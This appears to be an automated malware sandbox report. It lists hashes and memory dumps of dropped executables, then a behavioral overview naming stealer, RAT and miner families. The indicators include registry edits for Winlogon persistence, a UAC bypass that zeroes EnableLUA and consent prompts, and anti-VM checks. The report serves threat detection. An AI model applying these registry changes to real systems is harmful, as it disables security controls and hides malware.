memory/1648-283-0x0000000004CC0000-0x0000000004DD3000-memory.dmp
memory/1648-282-0x0000000004CC0000-0x0000000004DDA000-memory.dmp
memory/1648-328-0x0000000004CC0000-0x0000000004DD3000-memory.dmp
memory/1648-322-0x0000000004CC0000-0x0000000004DD3000-memory.dmp
memory/1648-312-0x0000000004CC0000-0x0000000004DD3000-memory.dmp
memory/1648-304-0x0000000004CC0000-0x0000000004DD3000-memory.dmp
memory/1648-288-0x0000000004CC0000-0x0000000004DD3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
| MD5 | 5950611ed70f90b758610609e2aee8e6 |
| SHA1 | 798588341c108850c79da309be33495faf2f3246 |
| SHA256 | 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4 |
| SHA512 | 7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80 |
memory/1648-1481-0x0000000004EA0000-0x0000000004EEC000-memory.dmp
memory/3412-1485-0x0000000000A80000-0x00000000011FB000-memory.dmp
memory/1648-1480-0x0000000004E10000-0x0000000004E9A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
| MD5 | f8d528a37993ed91d2496bab9fc734d3 |
| SHA1 | 4b66b225298f776e21f566b758f3897d20b23cad |
| SHA256 | bc8458a8d78cf91129c84b153aafe8319410aacb8e14aec506897c8e0793ba02 |
| SHA512 | 75dc1bbb1388f68d121bab26fc7f6bf9dc1226417ad7ed4a7b9718999aa0f9c891fed0db3c9ea6d6ccb34288cc848dc44b20ea83a30afd4ea2e99cff51f30f5a |
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
| MD5 | 58f824a8f6a71da8e9a1acc97fc26d52 |
| SHA1 | b0e199e6f85626edebbecd13609a011cf953df69 |
| SHA256 | 5e5b808ed64c4f40e07a4894e1da294e364383f0a51adb7ec8c7568afba3eb17 |
| SHA512 | 7d6c752369ea83bad34873d8603c413e9372ff66adcaad11e7f23d3ce85827e057444b30eadf927329191825aef4dc37a1e68c30b71fae4ce6f53708102fb461 |
memory/5708-1505-0x0000000000C70000-0x00000000010E6000-memory.dmp
memory/5708-1510-0x0000000000C70000-0x00000000010E6000-memory.dmp
memory/5708-1511-0x0000000000C70000-0x00000000010E6000-memory.dmp
memory/4748-1513-0x0000000000400000-0x0000000000A9C000-memory.dmp
memory/4748-1519-0x0000000000400000-0x0000000000A9C000-memory.dmp
memory/3412-1527-0x0000000000A80000-0x00000000011FB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
| MD5 | 3297554944a2e2892096a8fb14c86164 |
| SHA1 | 4b700666815448a1e0f4f389135fddb3612893ec |
| SHA256 | e0a9fcd5805e66254aa20f8ddb3bdfca376a858b19222b178cc8893f914a6495 |
| SHA512 | 499aa1679f019e29b4d871a472d24b89adddc68978317f85f095c7278f25f926cbf532c8520c2f468b3942a3e37e9be20aea9f83c68e8b5e0c9adbf69640ad25 |
memory/5644-1535-0x00000000005B0000-0x0000000000F8C000-memory.dmp
memory/5644-1536-0x00000000005B0000-0x0000000000F8C000-memory.dmp
memory/5644-1537-0x00000000005B0000-0x0000000000F8C000-memory.dmp
memory/5644-1552-0x0000000007D00000-0x0000000007D76000-memory.dmp
memory/5644-1551-0x0000000007C50000-0x0000000007C5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
| MD5 | 87d7fffd5ec9e7bc817d31ce77dee415 |
| SHA1 | 6cc44ccc0438c65cdef248cc6d76fc0d05e79222 |
| SHA256 | 47ae8e5d41bbd1eb506a303584b124c3c8a1caeac4564252fa78856190f0f628 |
| SHA512 | 1d2c6ec8676cb1cfbe37f808440287ea6a658d3f21829b5001c3c08a663722eb0537cc681a6faa7d39dc16a101fa2bbf55989a64a7c16143f11aa96033b886a5 |
memory/5708-1563-0x0000000000C70000-0x00000000010E6000-memory.dmp
memory/5644-1564-0x00000000085F0000-0x0000000008656000-memory.dmp
memory/3808-1593-0x00007FF69D450000-0x00007FF69D8E0000-memory.dmp
memory/5644-1594-0x0000000008BA0000-0x0000000008BBE000-memory.dmp
memory/5644-1597-0x0000000009080000-0x00000000090CC000-memory.dmp
memory/5644-1596-0x0000000008CE0000-0x0000000009034000-memory.dmp
memory/5644-1595-0x0000000008C70000-0x0000000008CDA000-memory.dmp
memory/5644-1600-0x0000000009330000-0x0000000009380000-memory.dmp
memory/5644-1601-0x00000000093B0000-0x00000000093D2000-memory.dmp
memory/5644-1599-0x0000000009220000-0x00000000092D2000-memory.dmp
memory/5644-1613-0x0000000009400000-0x0000000009421000-memory.dmp
memory/5644-1612-0x0000000009440000-0x000000000947C000-memory.dmp
memory/5644-1614-0x000000000A1B0000-0x000000000A4DE000-memory.dmp
memory/2968-1633-0x0000000005270000-0x00000000053D0000-memory.dmp
memory/2968-1634-0x0000000005A20000-0x0000000005FC4000-memory.dmp
memory/2968-1635-0x0000000004F80000-0x0000000004FA2000-memory.dmp
memory/5644-1651-0x000000000A580000-0x000000000A612000-memory.dmp
memory/5644-1660-0x000000000A4E0000-0x000000000A4F2000-memory.dmp
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
| MD5 | 53e54ac43786c11e0dde9db8f4eb27ab |
| SHA1 | 9c5768d5ee037e90da77f174ef9401970060520e |
| SHA256 | 2f606d24809902af1bb9cb59c16a2c82960d95bff923ea26f6a42076772f1db8 |
| SHA512 | cd1f6d5f4d8cd19226151b6674124ab1e10950af5a049e8c082531867d71bfae9d7bc65641171fd55d203e4fba9756c80d11906d85a30b35ee4e8991adb21950 |
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
| MD5 | f89267b24ecf471c16add613cec34473 |
| SHA1 | c3aad9d69a3848cedb8912e237b06d21e1e9974f |
| SHA256 | 21f12abb6de14e72d085bc0bd90d630956c399433e85275c4c144cd9818cbf92 |
| SHA512 | c29176c7e1d58dd4e1deafcbd72956b8c27e923fb79d511ee244c91777d3b3e41d0c3977a8a9fbe094bac371253481dde5b58abf4f2df989f303e5d262e1ce4d |
memory/5644-1702-0x00000000005B0000-0x0000000000F8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
| MD5 | 5b39766f490f17925defaee5de2f9861 |
| SHA1 | 9c89f2951c255117eb3eebcd61dbecf019a4c186 |
| SHA256 | de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a |
| SHA512 | d216fa45c98e423f15c2b52f980fc1c439d365b9799e5063e6b09837b419d197ba68d52ea7facf469eae38e531f17bd19eaf25d170465dc41217ca6ab9eb30bf |
memory/4092-1713-0x000001E243BD0000-0x000001E244060000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tmp5DFA.tmp
| MD5 | 6d7ac32d2ea820df69b5be605469fbbb |
| SHA1 | 33f9c064a60e144bf219046b6ee3a8b3aa5ce4d1 |
| SHA256 | 3205e2a5085444cc9114710563045a4cf7260f2ed13ba5af3e925143b07e8602 |
| SHA512 | 883bfacc7dfa159230b97196a271b2ddf2e2fdb116082197520392c09cf4f44f605e96cc85605ebbde24fa636b8e8b36386c21ecb9a741ba806af9cfb2cfcf8d |
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\84ef8e32cf3dd22e15e36759d999f0aa_755b0f1a-bb38-4bb2-bc7e-240c892146ee
| MD5 | ebe34ab65dbc93205053d8673426c885 |
| SHA1 | 98d7eac37e9d68ca80f159441c3038afcd4db33b |
| SHA256 | c3184764873899e8d757a160e30c6760c20472f2fcdb55eb0fd1a2bbdae3954e |
| SHA512 | b70ec40bc0659e8b460e540fc561f3b55fe546e2570fb35d2dbb4eddaf0761df55dde9126ad372f11bfe901d2e35a60e6f045698c35f3931bcd3972143ca8369 |
memory/1648-1751-0x0000000004F50000-0x0000000004FA4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E871967A79ACDC2112AB3F14AF3D7F46D52A1039
| MD5 | 4e447732d6b9902192d42eb6cdcd0d79 |
| SHA1 | 941c02b1f28efce5e4015d62a6ba94d926bb8caa |
| SHA256 | 6d47d1389b6e7d5f22159462b4db9d6ea5688d893b89e15f0ef98c289ea0c98e |
| SHA512 | f48335a4115a82139ed1dbb21881ce49f62966fbf74805b6f3eed3386b9b0641e8cb4ef030ab7ac8f2391a2453b928a7cc7747ee192fd26c516e696fcaa97c1e |
memory/5708-2352-0x0000000007800000-0x000000000780A000-memory.dmp
memory/3216-2504-0x0000000000400000-0x0000000000A9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
| MD5 | 9821fa45714f3b4538cc017320f6f7e5 |
| SHA1 | 5bf0752889cefd64dab0317067d5e593ba32e507 |
| SHA256 | fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72 |
| SHA512 | 90afec395115d932ea272b11daa3245769bdcc9421ecd418722830259a64df19ed7eacca38000f6a846db9f4363817f13232032ab30f2ab1aa7e88097361d898 |
memory/3304-4152-0x00007FF6579D0000-0x00007FF657E60000-memory.dmp
memory/3304-4165-0x00007FF6579D0000-0x00007FF657E60000-memory.dmp
memory/3216-4181-0x0000000000400000-0x0000000000A9C000-memory.dmp
memory/5708-4184-0x0000000009DC0000-0x0000000009DCE000-memory.dmp
memory/5708-4185-0x000000000A400000-0x000000000AA28000-memory.dmp
memory/5708-4196-0x000000000AFD0000-0x000000000B006000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ogvuzz.exe
| MD5 | 583d187384f6ffb863c6dceb99382413 |
| SHA1 | f8c93a13105eec96395e4cf0eb9b81d35fa85d5e |
| SHA256 | 1e568ef24328e5d91864810ada4e4b318ad147b626bc648507405e0e85feb322 |
| SHA512 | ec21559d0a9761a4464dbaf0c193fc0493367e287f96ccae63960b92604b2bba0435e6716f5c16de99603e7e4f8d6fe6fb117e543227b2ccecb980fa6c6a2005 |
memory/5708-4195-0x000000000AF70000-0x000000000AF8A000-memory.dmp
memory/5708-4211-0x000000000B690000-0x000000000BD0A000-memory.dmp
memory/5708-4213-0x0000000009E80000-0x0000000009F16000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\kjksfm.exe
| MD5 | 7353f60b1739074eb17c5f4dddefe239 |
| SHA1 | 6cbce4a295c163791b60fc23d285e6d84f28ee4c |
| SHA256 | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c |
| SHA512 | bd98c8aee1138d17c39f2fb0e09bf79ef2d6096464ceb459cc66c5fb670df093414a373bbb4b4d8e7063c2eacb120449c45df218033f2258f56bec1618b43c4c |
memory/3216-4218-0x0000000000400000-0x0000000000A9C000-memory.dmp
memory/5708-4217-0x0000000009B40000-0x0000000009B8A000-memory.dmp
memory/5708-4216-0x0000000009970000-0x000000000998E000-memory.dmp
memory/5708-4215-0x0000000009920000-0x0000000009942000-memory.dmp
memory/5708-4219-0x000000000B110000-0x000000000B464000-memory.dmp
memory/5708-4221-0x0000000009F20000-0x0000000009F86000-memory.dmp
memory/5708-4231-0x000000000BE60000-0x000000000BEAC000-memory.dmp
memory/6420-4232-0x00000222FF370000-0x00000222FF3B4000-memory.dmp
memory/6420-4233-0x00000222FF440000-0x00000222FF4B6000-memory.dmp
memory/5708-4243-0x000000000CBE0000-0x000000000CBFE000-memory.dmp
memory/5708-4244-0x000000000DF10000-0x000000000DFB3000-memory.dmp
memory/5708-4245-0x000000000CC60000-0x000000000CC6A000-memory.dmp
memory/5708-4248-0x000000000DFE0000-0x000000000DFF1000-memory.dmp
memory/5708-4249-0x000000000DFC0000-0x000000000DFCE000-memory.dmp
memory/5708-4250-0x000000000E000000-0x000000000E014000-memory.dmp
memory/5708-4251-0x000000000E040000-0x000000000E05A000-memory.dmp
memory/5708-4252-0x000000000E060000-0x000000000E068000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
| MD5 | 4c64aec6c5d6a5c50d80decb119b3c78 |
| SHA1 | bc97a13e661537be68863667480829e12187a1d7 |
| SHA256 | 75c7692c0f989e63e14c27b4fb7d25f93760068a4ca4e90fa636715432915253 |
| SHA512 | 9054e3c8306999fe851b563a826ca7a87c4ba78c900cd3b445f436e8406f581e5c3437971a1f1dea3f5132c16a1b36c2dd09f2c97800d28e7157bd7dc3ac3e76 |
C:\Users\Admin\AppData\Roaming\10000520110\123719821238.dll
| MD5 | 44163d81bb5710839fb9ba265de2c942 |
| SHA1 | a7497d6085ed8ce25e9728a0af7e989e026eaf04 |
| SHA256 | de4e3ff7f7da5d5561e384585a9d0cb66f2c51ea324c184848d125d8792bf666 |
| SHA512 | 97ef4974f41affd04eb960fa873cd9754f31007c3d7239a7fb5b17cc152c01f2050c3b25d107e36ab5c65010610624e773f726de7d39255bb2c0ad5d8b9929a4 |
C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
| MD5 | 6763ecebb557237980b32c8a5872bae0 |
| SHA1 | 69d6500dabfe1d27fcf2586dff0cb8d51057c1fd |
| SHA256 | 007585f948d9b37143906f1ded66250c7234fbfd65ff9d91b251632340389219 |
| SHA512 | 09e063dde5da8e4032e0c691921f667d00d7d47766b5cf62b5d4f17cb83bc5c989c32eae9ed075a5d182ed3ecd9e89cd805722f7cf629ae2d5dc91542effa867 |
memory/6676-4337-0x0000000000810000-0x000000000092A000-memory.dmp
memory/6676-4338-0x0000000005170000-0x0000000005256000-memory.dmp
memory/6676-4340-0x00000000052E0000-0x00000000053C6000-memory.dmp
memory/6676-5517-0x0000000005400000-0x0000000005458000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\888.exe
| MD5 | b6e5859c20c608bf7e23a9b4f8b3b699 |
| SHA1 | 302a43d218e5fd4e766d8ac439d04c5662956cc3 |
| SHA256 | bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075 |
| SHA512 | 60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c |
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
| MD5 | 47f6b0028c7d8b03e2915eb90d0d9478 |
| SHA1 | abc4adf0b050ccea35496c01f33311b84fba60c6 |
| SHA256 | c656d874c62682dd7af9ab4b7001afcc4aab15f3e0bc7cdfd9b3f40c15259e3f |
| SHA512 | ae4e7b9a9f4832fab3fe5c7ad7fc71ae5839fd8469e3cbd2f753592853a441aa89643914eda3838cd72afd6dee029dd29dc43eaf7db3adc989beab43643951a2 |
memory/4952-6722-0x00007FF6579D0000-0x00007FF657E60000-memory.dmp
memory/4952-6745-0x00007FF6579D0000-0x00007FF657E60000-memory.dmp
memory/5788-6782-0x0000028954E80000-0x000002895550E000-memory.dmp
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs
| MD5 | 6c3367fffb9ad252ba68770ee7260064 |
| SHA1 | 0d13fece1b16c41b7f70ad13111bf0f7355c8cfe |
| SHA256 | 0afe0d855bd3addd15dd4548d3b8e1995e62723a5952d0efa22b7b8f1a9bc82c |
| SHA512 | 3a064b1e3996198cc8eb56673743c94565758d6d87a0b4b50eca4a3f41a467a63e91793f7ebae75b8d8bd86499a157e2921bbca5158c543b56d6ff7ed79d0281 |
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp
| MD5 | 7cec98d7beca577470fd4edc6149b094 |
| SHA1 | 9891fdfe2a9561831a781418701cb3937f8d80f3 |
| SHA256 | 3c0d754b1c1d0a1b2cf38d116a2198247cc183ac10112c7094df65aab227781a |
| SHA512 | 8e9b79fb8f3c66459450e4e6d5788e7769d41ee65ad569de8edbf3254eaa61a5ff51ab453630150f804d53839839f5d25ccf28e93d95a01d69363cbf81f82332 |
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new
| MD5 | 6bcadbd9680b2ebb703aeed478f8d2b8 |
| SHA1 | cbb2837f79fd56ff5047140eea50a4b4c6c72cf5 |
| SHA256 | 0be5ecd6a9d91d6be69ea2c19bdd25ff67156caf23649935fe60b68a182e81ab |
| SHA512 | 3eb59d4c2b088d56669048db809d04eeb4834dd7b1d74f425037f46e8c76ed948727fbab5762a992cd8cd113c88053b388402436792e69d0eaa088c85a7e87a7 |
C:\Users\Admin\AppData\Local\Temp\a\info.exe
| MD5 | ca298b43595a13e5bbb25535ead852f7 |
| SHA1 | 6fc8d0e3d36b245b2eb895f512e171381a96e268 |
| SHA256 | 0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e |
| SHA512 | 8c591cd0693b9516959c6d1c446f5619228021c1e7a95c208c736168cc90bc15dba47aca99aa6349f8e056a5c7f020c34b751d551260f9d3ba491b11cd953cf5 |
memory/4584-7909-0x0000000000400000-0x000000000197D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\50.exe
| MD5 | 38c56adb21dc68729fcc9b2d97d72ac1 |
| SHA1 | c08c6d344aa88b87d7741d4b249dcc937dad0cea |
| SHA256 | 7807125f9d53afac3fe1037dd8def3f039cba5f57a170526bdaaf2e0e09365fb |
| SHA512 | c4f5a7fa9013dfe33a89dcca5640f37b5309b5ef354a5518877512bbbdc072ba8bfaebde0da3b55aacf0bdcbb443d368a3f60e91bedea6c1cc754393943ca530 |
memory/4584-8121-0x0000000000400000-0x000000000197D000-memory.dmp
memory/4580-8171-0x0000000000C10000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
| MD5 | b70651a7c5ec8cc35b9c985a331ffca3 |
| SHA1 | 8492a85c3122a7cac2058099fb279d36826d1f4d |
| SHA256 | ed9d94e2dfeb610cb43d00e1a9d8eec18547f1bca2f489605f0586969f6cd6d6 |
| SHA512 | 3819216764b29dad3fabfab42f25f97fb38d0f24b975366426ce3e345092fc446ff13dd93ab73d252ea5f77a7fc055ad251e7017f65d4de09b0c43601b5d3fd5 |
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
| MD5 | a9255b6f4acf2ed0be0f908265865276 |
| SHA1 | 526591216c42b2ba177fcb927feee22267a2235d |
| SHA256 | 3f25f1c33d0711c5cc773b0e7a6793d2ae57e3bf918b176e2fa1afad55a7337a |
| SHA512 | 86d6eaf7d07168c3898ef0516bbd60ef0a2f5be097a979deb37cea90c71daff92da311c138d717e4bb542de1dbd88ef1b6f745b9acbfb23456dd59119d556a50 |
memory/1224-8220-0x000002763D1E0000-0x000002763D232000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpB9A7.tmp.dat
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\tmpB9A4.tmp.dat
| MD5 | ab87d892a202f83f7e925c5e294069e8 |
| SHA1 | 0b86361ff41417a38ce3f5b5250bb6ecd166a6a1 |
| SHA256 | bdc61a1c60fe8c08fe7a5256e9c8d7ad1ba4dd0963a54357c484256fc8834130 |
| SHA512 | f9a03eaae52d7fb544047fea3ffa7d8c6f7debdbb907348adfc46545e7b6c3783427983f16885ae138e43e51eec6ce73520c38581e4d9bb7140beeae2137de41 |
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
| MD5 | 230f75b72d5021a921637929a63cfd79 |
| SHA1 | 71af2ee3489d49914f7c7fa4e16e8398e97e0fc8 |
| SHA256 | a5011c165dbd8459396a3b4f901c7faa668e95e395fb12d7c967c34c0d974355 |
| SHA512 | 3dc11aac2231daf30871d30f43eba3eadf14f3b003dd1f81466cde021b0b59d38c5e9a320e6705b4f5a0eeebf93f9ee5459173e20de2ab3ae3f3e9988819f001 |
memory/4840-8330-0x00000235EA2F0000-0x00000235EA330000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
| MD5 | 6217bdb87132daca22cb3a9a7224b766 |
| SHA1 | be9b950b53a8af1b3d537494b0411f663e21ee51 |
| SHA256 | 49433ad89756ef7d6c091b37770b7bd3d187f5b6f5deb0c0fbcf9ee2b9e13b2e |
| SHA512 | 80de596b533656956ec3cda1da0b3ce36c0aa5d19b49b3fce5c854061672cf63ad543daaf9cf6a29a9c8e8b543c3630aab2aaea0dba6bf4f9c0d8214b7fadbe6 |
memory/6404-8435-0x0000000000620000-0x0000000000634000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
| MD5 | db69b881c533823b0a6cc3457dae6394 |
| SHA1 | 4b9532efa31c638bcce20cdd2e965ad80f98d87b |
| SHA256 | 362d1d060b612cb88ec9a1835f9651b5eff1ef1179711892385c2ab44d826969 |
| SHA512 | b9fe75ac47c1aa2c0ba49d648598346a26828e7aa9f572d6aebece94d8d3654d82309af54173278be27f78d4b58db1c3d001cb50596900dee63f4fb9988fb6df |
memory/2284-8488-0x0000000000650000-0x0000000000666000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
| MD5 | 4d58df8719d488378f0b6462b39d3c63 |
| SHA1 | 4cbbf0942aeb81cc7d0861d3df5c9990c0c0c118 |
| SHA256 | ecf528593210cf58333743a790294e67535d3499994823d79a1c8d4fa40ec88d |
| SHA512 | 73a5fea0cf66636f1f7e1cf966a7d054e01162c6e8f1fc95626872d9e66ea00018a15a1b5615f5398c15316e50bf40336c124c7320b1d66893c1edb16c36b738 |
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
| MD5 | 2a4ccc3271d73fc4e17d21257ca9ee53 |
| SHA1 | 931b0016cb82a0eb0fd390ac33bada4e646abae3 |
| SHA256 | 5332f713bef3ab58d7546f2b58e6eaf55c3e30969e15b6085a77e7fd9e7b65b4 |
| SHA512 | 00d6728fa5c2692dab96107187126a44e09976f0d26875f340b3ad0d3f202abb4fbc5426f2934096087ef6e404bc1dc21b6e6ebbacba172c383d57bdef185a74 |
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
| MD5 | eaef085a8ffd487d1fd11ca17734fb34 |
| SHA1 | 9354de652245f93cddc2ae7cc548ad9a23027efa |
| SHA256 | 1e2731a499887de305b1878e2ad6b780ff90e89bc9be255ae2f4c6fa56f5cf35 |
| SHA512 | bfda0cb7297d71ad6bf74ec8783e279547740036dd9f42f15640d8700216cdd859b83cc720e9f3889a8743671b4d625774f87e0d1768f46d018fccaf4dbef20e |
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
| MD5 | d4a8ad6479e437edc9771c114a1dc3ac |
| SHA1 | 6e6970fdcefd428dfe7fbd08c3923f69e21e7105 |
| SHA256 | a018a52ca34bf027ae3ef6b4121ec5d79853f84253e3fad161c36459f566ac2b |
| SHA512 | de181dc79ca4c52ce8de3abc767fbb8b4fd6904d278fa310eee4a66056161c0b9960ef7bebf2ebf6a9d19b653190895e5d1df92c314ca04af748351d6fb53e07 |
memory/6800-8550-0x0000000000120000-0x0000000000370000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
| MD5 | aeb9f8515554be0c7136e03045ee30ac |
| SHA1 | 377be750381a4d9bda2208e392c6978ea3baf177 |
| SHA256 | 7f671b0f622d94aebf0c6ab2f021b18e1c60beda819bc48c0b2c6a8f5fdd7e02 |
| SHA512 | d0cfc09d01bd42e0e42564f99332030ed2ff20624bfd83a3f1bb3682fe004e90d89539f5868bba637287795e2668dd14409e2e0ed2ea1c6982c7ce11db727bb4 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-12 18:16
Reported
2024-12-12 18:19
Platform
win10v2004-20241007-en
Max time kernel
118s
Max time network
148s
Command Line
Signatures
DcRat
Dcrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Local\\updater.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe | N/A |
NanoCore
Nanocore family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Snake Keylogger
Snake Keylogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Snakekeylogger family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4364 created 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif | C:\Windows\Explorer.EXE |
| PID 408 created 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\3532634971.exe | C:\Windows\Explorer.EXE |
| PID 408 created 3440 | N/A | C:\Users\Admin\AppData\Local\Temp\3532634971.exe | C:\Windows\Explorer.EXE |
| PID 4340 created 3440 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 4340 created 3440 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 4340 created 3440 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Xmrig family
Xworm
Xworm family
xmrig
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
